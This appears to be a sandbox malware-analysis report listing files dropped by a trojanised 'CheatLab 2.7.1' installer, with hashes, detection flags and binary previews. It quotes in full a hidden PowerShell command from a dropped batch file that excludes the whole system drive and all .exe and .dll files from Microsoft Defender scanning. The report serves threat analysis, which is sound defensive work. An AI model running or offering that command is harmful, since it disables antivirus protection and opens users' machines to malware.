                                                    SHA-256:FAAE54EF7B6D95D51170AF65A46516C95A9D0FBD280350542343E6501CF349B7
                                                    SHA-512:7EC3EFE12EEE64266233A49E701DE7A203C92E346FB657F8E0188F43110B748C2CE13EE49951A16C27DCF16C2718F21A14F55FBEC0B8F677E68CDBBD90052AA1
                                                    Malicious:false
                                                    Preview:.LJ..........-.......8...L.......G.......-...-...4...>...>...>...>...>...>...>...>...-...-...D...........$.......-.......B...3...2...L........K.......-...-...4...>...>...>...>...>...>...>...>...>...-...-...D...........$.......-.......B...3...2...L........'.......-...-...4...-...-...D...........$.......-.......B...3...2...L........0.......-...........-...-...)...<...-...L........3.......-...-...4...>...>...>...-...-...D...........$.......-.......B...3...2...L........I.......-...-...8.......<...-...8.......X...-...-...,...<...<...K.........;.......-...-...4...>...>...>...>...>...-...-...D...........$.......-.......B...3...2...L........+.......-...-...4...>...-...-...D...........$.......-.......B...3...2...L........i.......)...:.......X...U...-...-...8...........<...-...8.......X...-...-...,...<...<...8...X...K.........5.......-...-...4...G...?...-...-...D.................$.......-.......B...3...2...L........7.......-...-...4...>...>...>...>...-...-...D...........$.......-.......B...3...2

                                                    C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe

                                                    Download File
                                                    Process:C:\Windows\System32\msiexec.exe
                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):1159184
                                                    Entropy (8bit):6.055954963040363
                                                    Encrypted:false
                                                    SSDEEP:12288:Dg8wp/DwJ6HgGnY9jU7rLk8tQy50+WPBdrU4K9Afu2uznkCVAZ0e3B4oQ30:+Lo6HgiY9crLk82+W5vKMu4qa0lRk
                                                    MD5:1BC7714501F86D5988816461F3637269
                                                    SHA1:4FF12702900CE9F2F68300B75697BA957E481F7E
                                                    SHA-256:EFB4F9570A7078FD687C9F1CEFCFFFC76AB03787636C038C2230912DB43F255A
                                                    SHA-512:4F7797A6FCE9E68E86B718CEF38A894A9A1AA5FEF00CEF55A8D0773C753506012B7194661AB20AEF06AE627B4147F719F89043D9D13FD63C17B5AE21261ACAC5
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                    • Antivirus: Virustotal, Detection: 1%, Browse
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[l8...V...V...V..fR...V..fU...V..fS...V..fW...V...W.r.V..wS.8.V..wR...V..wU...V...V...V.{wR.\.V.{wV...V.{wT...V.Rich..V.........PE..d...d.d..........".... ............X..........@....................................tC....`.........................................P... ...p...(............P..................|....W..............................@V..@...............P............................text...P........................... ..`.rdata..............................@..@.data...8T.......@..................@....pdata.......P......................@..@_RDATA..\...........................@..@.reloc..|...........................@..B................................................................................................................................................................................................................................................

                                                    C:\Program Files\CheatLab Corp\CheatLab 2.7.1\exclusion.bat

                                                    Download File
                                                    Process:C:\Windows\System32\msiexec.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):128
                                                    Entropy (8bit):4.7202350646624245
                                                    Encrypted:false
                                                    SSDEEP:3:VSJJFIf9IMwEIF2VCceGAFddGeWLCX3AYGeWLERySn/n:s81xB1eGgdEY3AYGWRy0n
                                                    MD5:89DB4CB88ED70579D72B500340691359
                                                    SHA1:5A434F58080EEDFC78B0BA0A49710C6F3EFC5254
                                                    SHA-256:72B2FAA3B9D4FB7CD3E007CF5DFB00D03893B26A6161D6ADE8D003F3D669C57E
                                                    SHA-512:6E47F9F9DB0FCF42489567AD5DA1F1A031FC7423EE2DC79F94CDC3FF249FE18D1E8835D1A26655F4FE5BF58E8525EDBD227B12ED15EFFDDFF51642D57DB1E0BB
                                                    Malicious:false
                                                    Preview:powershell -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force"

                                                    C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_connect.exe_493109bcf53b740e3d842cd6c3d8db14afd12da_290c3282_99fd837c-4194-4a77-8cd7-192fdce1a3eb\Report.wer

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):65536
                                                    Entropy (8bit):0.8408235807894398
                                                    Encrypted:false
                                                    SSDEEP:96:CSFTAxCjN/sbhuzxTMbTdQXIDcQvc6QcEVcw3cE/X+HbHg/rZHLnxZOycAYoDIhc:RhN/rT0BU/wjP1zuiF8Z24IO8c
                                                    MD5:037629E0C02A7F33F208500ED24C3DBE
                                                    SHA1:4CFBD657EF9441C672B3D5C8CF779ABEE5EA552F
                                                    SHA-256:027E8F0328F71728CD5A3E10929D39F8FA311CCD5F341B28D763336B046CEB17
                                                    SHA-512:BF4C630B0CE8DC407FF12DCEBA8CF2A084D9B02C3F2FE513A18E7EB72D3589071D05D47BD11D8D46A3BBB56C05BCA7FED21447335FFBE09BDD83811DA89AD910
                                                    Malicious:false
                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.4.3.5.3.1.4.5.3.4.1.0.9.1.7.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.4.3.5.3.1.4.5.3.9.6.9.4.1.5.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.9.f.d.8.3.7.c.-.4.1.9.4.-.4.a.7.7.-.8.c.d.7.-.1.9.2.f.d.c.e.1.a.3.e.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.f.a.b.b.6.c.5.-.c.e.f.4.-.4.8.b.2.-.8.1.b.4.-.8.b.f.6.4.d.3.d.0.4.c.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.c.o.n.n.e.c.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.f.5.0.-.0.0.0.1.-.0.0.1.4.-.f.9.d.a.-.8.2.2.5.b.6.0.e.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.f.b.d.1.8.d.7.1.f.7.8.f.4.d.a.5.8.5.5.0.7.6.2.3.a.d.6.9.a.c.0.9.0.0.0.0.f.f.f.f.!.0.0.0.0.5.e.2.7.6.9.7.0.e.2.7.d.3.e.0.f.f.1.b.3.5.f.e.9.3.c.1.2.f.5.2.1.d.b.d.9.e.3.3.5.!.c.o.n.n.e.c.t...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.

                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER4B71.tmp.dmp

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:Mini DuMP crash report, 15 streams, Sat Nov 4 00:30:53 2023, 0x1205a4 type
                                                    Category:dropped
                                                    Size (bytes):110944
                                                    Entropy (8bit):3.632695539671375
                                                    Encrypted:false
                                                    SSDEEP:768:JibmiuoPVqBpNNFWt0zE2vrvC6hwfHLTggjA7BM/07+LHDnneB5mOD:JN+upN4uE2aOiLTgVM/0CDyB5mOD
                                                    MD5:AA3AEABEC4F86B3CD13342924CF5712E
                                                    SHA1:2635506BC498A644EF130415A2700C00C8D4D5E8
                                                    SHA-256:D28D0A32CA616D976A158E58E87414C3E1A20D9EFD626C60B661DEE7C1AF449D
                                                    SHA-512:2F7018E2521CCF32906F4BA7C9602309580B833D169CCA5286C709FF39B320CF062850AF6B80A05C4E10D66B8840BD45C27363FC5FC83E630BD2F27F29D886C4
                                                    Malicious:false
                                                    Preview:MDMP..a..... .........Ee............$...............8.......$...........t..../..........`.......8...........T...........X!..........................................................................................................eJ......d.......GenuineIntel............T.......P.....Ee.............................0..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER4C7C.tmp.WERInternalMetadata.xml

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):8320
                                                    Entropy (8bit):3.6982141681142355
                                                    Encrypted:false
                                                    SSDEEP:192:R6l7wVeJgjx6TF98v6YVPSU+gmf540gCprf89boHsfZYm:R6lXJKx6Bav6Y9SU+gmf540goMfT
                                                    MD5:E294CB42F45052A139F04724D774957E
                                                    SHA1:E00C3E64A1FC7C389A320F19B3E7AE29128EF3CB
                                                    SHA-256:E84F8742B8A041494A654C5014D3F5CB31E19AC2A11EEC1872DC0637AA175088
                                                    SHA-512:2B812B30038CC4BF5C3079FCB4515E463700487B31A529E7C8386B7308D8DF45E91F54ECC27222F1CC8FF551155712E8CD7AAAB272E53BA10879A51D281E0CC6
                                                    Malicious:false
                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.8.0.1.6.<./.P.i.

                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER4CBB.tmp.xml

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):4579
                                                    Entropy (8bit):4.461744243179641
                                                    Encrypted:false
                                                    SSDEEP:48:cvIwWl8zs6Jg77aI9ViWpW8VYqYm8M4JpjFGwl+q8nYFMYMKd:uIjfII7nj7ViJSwlJFMYMKd
                                                    MD5:65405514D5B8D137ABDF0995FE5C1684
                                                    SHA1:0086B2A47FD1EFF46B96D6E092AE8B579E40818C
                                                    SHA-256:44C1CA8F62EF7E00F08A104DEE95FEE0131C089484C20663755EAA918DDF28A7
                                                    SHA-512:872DBF3035961CC434533ED6D707F9732A6BDDB9EECDD7AE9F8A3400E9E7AA4C8F3970706AFF3C776EF0BAA6CF73D57FFA1C37A08919E04D9FD20D8F269AA382
                                                    Malicious:false
                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="45573" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096

                                                    C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\CheatLab.lua

                                                    Download File
                                                    Process:C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):129927
                                                    Entropy (8bit):6.053213381620977
                                                    Encrypted:false
                                                    SSDEEP:3072:dCU9tteOLNPovJDbZyGRKwgu9ZdregF3yDqLS0Fa/csLWDJTETa+S3:lBwKwguUgUsS0FccUW1Tca+S3
                                                    MD5:CEDDECD1649237697C1211B3F9B54EED
                                                    SHA1:4060C06B908CC5B4ED9BD52DBE34685110205BA9
                                                    SHA-256:FAAE54EF7B6D95D51170AF65A46516C95A9D0FBD280350542343E6501CF349B7
                                                    SHA-512:7EC3EFE12EEE64266233A49E701DE7A203C92E346FB657F8E0188F43110B748C2CE13EE49951A16C27DCF16C2718F21A14F55FBEC0B8F677E68CDBBD90052AA1
                                                    Malicious:true
                                                    Preview:.LJ..........-.......8...L.......G.......-...-...4...>...>...>...>...>...>...>...>...-...-...D...........$.......-.......B...3...2...L........K.......-...-...4...>...>...>...>...>...>...>...>...>...-...-...D...........$.......-.......B...3...2...L........'.......-...-...4...-...-...D...........$.......-.......B...3...2...L........0.......-...........-...-...)...<...-...L........3.......-...-...4...>...>...>...-...-...D...........$.......-.......B...3...2...L........I.......-...-...8.......<...-...8.......X...-...-...,...<...<...K.........;.......-...-...4...>...>...>...>...>...-...-...D...........$.......-.......B...3...2...L........+.......-...-...4...>...-...-...D...........$.......-.......B...3...2...L........i.......)...:.......X...U...-...-...8...........<...-...8.......X...-...-...,...<...<...8...X...K.........5.......-...-...4...G...?...-...-...D.................$.......-.......B...3...2...L........7.......-...-...4...>...>...>...>...-...-...D...........$.......-.......B...3...2

                                                    C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exe

                                                    Download File
                                                    Process:C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe
                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):1159184
                                                    Entropy (8bit):6.055954963040363
                                                    Encrypted:false
                                                    SSDEEP:12288:Dg8wp/DwJ6HgGnY9jU7rLk8tQy50+WPBdrU4K9Afu2uznkCVAZ0e3B4oQ30:+Lo6HgiY9crLk82+W5vKMu4qa0lRk
                                                    MD5:1BC7714501F86D5988816461F3637269
                                                    SHA1:4FF12702900CE9F2F68300B75697BA957E481F7E
                                                    SHA-256:EFB4F9570A7078FD687C9F1CEFCFFFC76AB03787636C038C2230912DB43F255A
                                                    SHA-512:4F7797A6FCE9E68E86B718CEF38A894A9A1AA5FEF00CEF55A8D0773C753506012B7194661AB20AEF06AE627B4147F719F89043D9D13FD63C17B5AE21261ACAC5
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                    • Antivirus: Virustotal, Detection: 1%, Browse
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[l8...V...V...V..fR...V..fU...V..fS...V..fW...V...W.r.V..wS.8.V..wR...V..wU...V...V...V.{wR.\.V.{wV...V.{wT...V.Rich..V.........PE..d...d.d..........".... ............X..........@....................................tC....`.........................................P... ...p...(............P..................|....W..............................@V..@...............P............................text...P........................... ..`.rdata..............................@..@.data...8T.......@..................@....pdata.......P......................@..@_RDATA..\...........................@..@.reloc..|...........................@..B................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):2232
                                                    Entropy (8bit):5.379677338874509
                                                    Encrypted:false
                                                    SSDEEP:48:tWSU4y4RFymFoUeW+gZ9tK8NPZHUxL7u1iMugeoPUyus:tLHyIFvKLgZ2KRHWLOugYs
                                                    MD5:8C9DF4C6CA842BF517D5D82A38FDF986
                                                    SHA1:90EFA80E03912F3A0D033B3544CF0169A923D4F5
                                                    SHA-256:B9ACF17B9344B625BB13B836DA8F2730864C5A1B9414AE30F1390D2888FB5CC1
                                                    SHA-512:AD1E2766B9DECCD707C4A8EBB39FC62E9FD9AEB02819C0B2C19ABD877AB57E3BA07DD040EDFDF078DB114056DB1D1ADE9A0BC022B2E72E2B2C64D870FEC345F6
                                                    Malicious:false
                                                    Preview:@...e.................................,..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                    C:\Users\user\AppData\Local\Temp\MSI5CFA.tmp

                                                    Download File
                                                    Process:C:\Windows\System32\msiexec.exe
                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):446944
                                                    Entropy (8bit):6.403916470886214
                                                    Encrypted:false
                                                    SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                    MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                    SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                    SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                    SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                    • Antivirus: Virustotal, Detection: 0%, Browse
                                                    Joe Sandbox View:
                                                    • Filename: Cheat.Lab.2.7.1.msi, Detection: malicious, Browse
                                                    • Filename: Cheat.Lab.2.7.0.msi, Detection: malicious, Browse
                                                    • Filename: file.exe, Detection: malicious, Browse
                                                    • Filename: , Detection: malicious, Browse
                                                    • Filename: AnyDesk.exe, Detection: malicious, Browse
                                                    • Filename: AnyDesk.exe, Detection: malicious, Browse
                                                    • Filename: winrar-611br.msi, Detection: malicious, Browse
                                                    • Filename: Firefox-x64.msi, Detection: malicious, Browse
                                                    • Filename: AnyDeskAPP.msi, Detection: malicious, Browse
                                                    • Filename: 6p2LSuB1em.msi, Detection: malicious, Browse
                                                    • Filename: AnyDesk.msi, Detection: malicious, Browse
                                                    • Filename: MERC_PG_MDLS.msi, Detection: malicious, Browse
                                                    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\Local\Temp\MSI5D78.tmp

                                                    Download File
                                                    Process:C:\Windows\System32\msiexec.exe
                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):446944
                                                    Entropy (8bit):6.403916470886214
                                                    Encrypted:false
                                                    SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                    MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                    SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                    SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                    SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                    • Antivirus: Virustotal, Detection: 0%, Browse
                                                    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\Local\Temp\MSI5D99.tmp

                                                    Download File
                                                    Process:C:\Windows\System32\msiexec.exe
                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):446944
                                                    Entropy (8bit):6.403916470886214
                                                    Encrypted:false
                                                    SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                    MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                    SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                    SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                    SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                    • Antivirus: Virustotal, Detection: 0%, Browse
                                                    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\Local\Temp\MSI5DA9.tmp

                                                    Download File
                                                    Process:C:\Windows\System32\msiexec.exe
                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):446944
                                                    Entropy (8bit):6.403916470886214
                                                    Encrypted:false
                                                    SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                    MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                    SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                    SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                    SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                    • Antivirus: Virustotal, Detection: 0%, Browse
                                                    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\Local\Temp\MSI5E18.tmp

                                                    Download File
                                                    Process:C:\Windows\System32\msiexec.exe
                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):446944
                                                    Entropy (8bit):6.403916470886214
                                                    Encrypted:false
                                                    SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                    MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                    SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                    SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                    SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                    • Antivirus: Virustotal, Detection: 0%, Browse
                                                    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\Local\Temp\MSI5E96.tmp

                                                    Download File
                                                    Process:C:\Windows\System32\msiexec.exe
                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):919520
                                                    Entropy (8bit):6.451406895673526
                                                    Encrypted:false
                                                    SSDEEP:24576:rx90VXSK4fSa6HXr1iWn8Zlv2x4ntHurpllQ6a:Nq4Fb6HXr1iWnYs4ntHurpllQ6a
                                                    MD5:6189CDCB92AB9DDBFFD95FACD0B631FA
                                                    SHA1:B74C72CEFCB5808E2C9AE4BA976FA916BA57190D
                                                    SHA-256:519F7AC72BEBA9D5D7DCF71FCAC15546F5CFD3BCFC37A5129E63B4E0BE91A783
                                                    SHA-512:EE9CE27628E7A07849CD9717609688CA4229D47579B69E3D3B5B2E7C2433369DE9557EF6A13FA59964F57FB213CD8CA205B35F5791EA126BDE5A4E00F6A11CAF
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                    • Antivirus: Virustotal, Detection: 0%, Browse
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........O...!S..!S..!S[."R..!S[.$R=.!S.%R..!S."R..!S.$R..!S[.%R..!S[. R..!S.. S..!S3.(R..!S3.!R..!S3..S..!S..S..!S3.#R..!SRich..!S........................PE..L...a<.a.........."!.....X...................p...............................@.......|....@.........................`A..t....A.......0.......................@..L...(...p...............................@............p...............................text...nV.......X.................. ..`.rdata.......p.......\..............@..@.data...<....`.......@..............@....rsrc........0......................@..@.reloc..L....@......................@..B................................................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\Local\Temp\MSI5EB6.tmp

                                                    Download File
                                                    Process:C:\Windows\System32\msiexec.exe
                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):446944
                                                    Entropy (8bit):6.403916470886214
                                                    Encrypted:false
                                                    SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                    MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                    SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                    SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                    SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                    Malicious:true
